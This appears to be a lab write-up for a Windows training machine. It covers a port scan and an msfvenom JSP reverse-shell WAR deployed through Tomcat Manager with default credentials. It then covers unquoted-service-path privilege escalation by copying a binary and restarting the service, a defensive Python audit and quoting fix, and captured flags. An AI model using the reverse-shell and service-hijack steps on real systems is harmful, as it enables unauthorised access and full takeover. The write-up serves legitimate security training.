Info

  • Name – Deployable
  • IP Address – 172.31.1.13

Enumeration

Open Ports

Port   Protocol  Service                  Version
135    tcp       msrpc                    Microsoft Windows RPC
137    udp       netbios-ns               Microsoft Windows netbios-ns
138    udp       netbios-dgm (filtered)
139    tcp       netbios-ssn              Microsoft Windows netbios-ssn
445    tcp       microsoft-ds             Microsoft Windows Server 2008 R2 – 2012 microsoft-ds
500    udp       isakmp (filtered)
3389   tcp       ms-wbt-server
4500   udp       nat-t-ike (filtered)
5985   tcp       http                     Microsoft HTTPAPI httpd 2.0
8009   tcp       ajp13                    Apache Jserv
8080   tcp       http                     Apache Tomcat/Coyote JSP engine 1.1
47001  tcp       http                     Microsoft HTTPAPI httpd 2.0
49152  tcp       msrpc                    Microsoft Windows RPC
49153  tcp       msrpc                    Microsoft Windows RPC
49154  tcp       msrpc                    Microsoft Windows RPC
49155  tcp       msrpc                    Microsoft Windows RPC
49156  tcp       msrpc                    Microsoft Windows RPC
49163  tcp       msrpc                    Microsoft Windows RPC
49164  tcp       msrpc                    Microsoft Windows RPC

Exploitation

Exploit Details (File Upload)

  • Name – File Upload
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A

Create a WAR file payload with msfvenom (set $lhost and $lport to the listener's address and port first).

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war > shell.war

Log in to the Tomcat Manager at http://172.31.1.13:8080/manager/html with the default credentials (tomcat / s3cret), select the WAR file in the upload form and click Deploy.

In the Applications list, click the newly deployed ‘/shell’ application to trigger the JSP.

Catch the reverse shell and read the access.txt file.

whoami
type C:\Users\tomcat\Desktop\access.txt

Privilege Escalation

Exploit Details (Unquoted Service path)

  • Name – Unquoted service path
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A

The Deploy service has an unquoted service path, and the current user account has write permission on the C:\Program Files\Deploy Ready\ folder, so a binary dropped there is run as the service account when the service restarts.

copy shell.exe "C:\Program Files\Deploy Ready\Service.exe"
net stop Deploy
net start Deploy
whoami
type C:\Users\Administrator\Desktop\system.txt
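As an added defensive check (not part of this writeup), the Python below models how the Service Control Manager hands an unquoted ImagePath to CreateProcess, lists the directories an administrator must lock down, and produces the quoting fix. The Deploy service's real ImagePath is not given on the page, so the sample values are constructed assumptions.

```python
import ntpath
# Constructed ImagePath values: the writeup does not give the Deploy service's
# real path, so these are assumptions for illustration.
SAMPLE_SERVICES = {
    "Deploy":   r"C:\Program Files\Deploy Ready\Service.exe -run",
    "Safe":     r'"C:\Program Files\Deploy Ready\Service.exe" -run',
    "EventLog": r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted",
}

def split_image_path(image_path):
    """(program, arguments): a leading quote delimits the program; otherwise it
    runs through the first token ending in .exe, or to the end of the string."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return (s[1:], "") if end == -1 else (s[1:end], s[end + 1:].strip())
    tokens = s.split()
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[:i + 1]), " ".join(tokens[i + 1:])
    return s, ""

def hijack_candidates(image_path):
    """Paths CreateProcess probes before the intended executable of an unquoted
    path: each space-delimited prefix, with .exe appended when it lacks an
    extension. A writable parent of any of them lets a planted binary run."""
    if image_path.strip().startswith('"'):
        return []                                # quoted: unambiguous
    tokens = split_image_path(image_path)[0].split()
    probes = []
    for i in range(1, len(tokens)):              # every prefix short of the full path
        prefix = " ".join(tokens[:i])
        probes.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
    return probes

def quoted_fix(image_path):
    """Remediated ImagePath: program quoted, arguments left untouched."""
    program, args = split_image_path(image_path)
    return f'"{program}"' + (f" {args}" if args else "")

def sc_config_command(name, image_path):
    """cmd.exe line applying the fix; sc expects embedded quotes as backslash-quote."""
    escaped = quoted_fix(image_path).replace('"', '\\"')
    return f'sc config {name} binPath= "{escaped}"'

def audit(services):
    """Unquoted services -> directories whose ACLs must deny write access to
    unprivileged users (verify on the host with icacls)."""
    return {name: sorted({ntpath.dirname(p) for p in hijack_candidates(path)})
            for name, path in services.items() if hijack_candidates(path)}
```

Feed it the PathName values from `Get-CimInstance Win32_Service` (or `sc qc`) exported from the host to get the same report for a real system.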

Loot

access.txt - 5b7dbd2f4ce39bb536fe1da6c897a4fb
system.txt - 11400db5d23b9738534002f27b86c030